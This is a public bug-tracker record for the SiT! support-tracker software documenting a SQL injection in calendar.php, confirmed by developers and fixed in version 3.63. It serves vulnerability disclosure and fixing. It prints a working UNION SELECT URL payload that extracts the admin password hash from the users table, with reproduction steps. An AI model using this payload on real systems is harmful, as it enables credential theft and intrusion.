SiT! Bugs - SiT!
View Issue Details
0001395SiT!calendarpublic2010-09-08 15:282011-04-16 15:07
Tomse 
paulh 
normalmajorunable to reproduce
closedfixed 
3.62 LTS 
3.63 LTS3.63 LTS 
0001395: possible SQL injection
/calendar.php?display=list&type=1 union all select 1,2,3,4,5,6,7,8,9,10,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from sit_users where id=1;--



I was given this line, it should extract the admin hash, I haven't been able to repro it..
Login to sit as any user, paste the above URL modified to your system (don't forget the sit_users table)

this will list the user admin with the hashed password value in the users field.

I've been able to reproduce this, both in the 3.62 and SVN
security
Issue History
2010-09-08 15:28TomseNew Issue
2010-09-11 12:33TomseDescription Updatedbug_revision_view_page.php?rev_id=180#r180
2010-09-11 12:33TomseSteps to Reproduce Updatedbug_revision_view_page.php?rev_id=182#r182
2010-09-11 12:35TomseDescription Updatedbug_revision_view_page.php?rev_id=183#r183
2010-09-11 13:44kieranNote Added: 0003408
2010-09-11 13:44kieranAssigned To => kieran
2010-09-11 13:44kieranStatusnew => confirmed
2010-10-09 11:16paulhStatusconfirmed => assigned
2010-10-09 11:16paulhAssigned Tokieran => paulh
2010-10-09 11:24ivanNote Added: 0003426
2010-10-09 11:27paulhNote Added: 0003427
2010-10-09 11:32paulhNote Added: 0003428
2010-10-09 11:32paulhStatusassigned => resolved
2010-10-09 11:32paulhResolutionopen => fixed
2010-10-09 11:32paulhFixed in Version => 3.63 LTS
2010-10-09 11:32paulhTarget Version => 3.63 LTS
2010-10-09 11:32paulhTag Attached: security
2011-04-16 13:21ivanNote Added: 0003708
2011-04-16 13:23ivanNote Added: 0003709
2011-04-16 13:23ivanView Statusprivate => public
2011-04-16 15:07ivanNote Added: 0003714
2011-04-16 15:07ivanStatusresolved => closed

Notes
(0003408)
kieran   
2010-09-11 13:44   
Confirmed here.
(0003426)
ivan   
2010-10-09 11:24   
I can confirm this too
(0003427)
paulh   
2010-10-09 11:27   
yeap I've managed to repro and have a fix almost ready
(0003428)
paulh   
2010-10-09 11:32   
r6693 and 58e5772 resolve this

This exploit is only available to authenticated users
(0003708)
ivan   
2011-04-16 13:21   
http://www.autosectools.com/Advisories/Support.Incident.Tracker.3.62_Reflected.Cross-site.Scripting_132.html [^]
(0003709)
ivan   
2011-04-16 13:23   
Magpierss issue fixed in r7110 and Git 5d06e50
(0003714)
ivan   
2011-04-16 15:07   
Fix Released in 3.63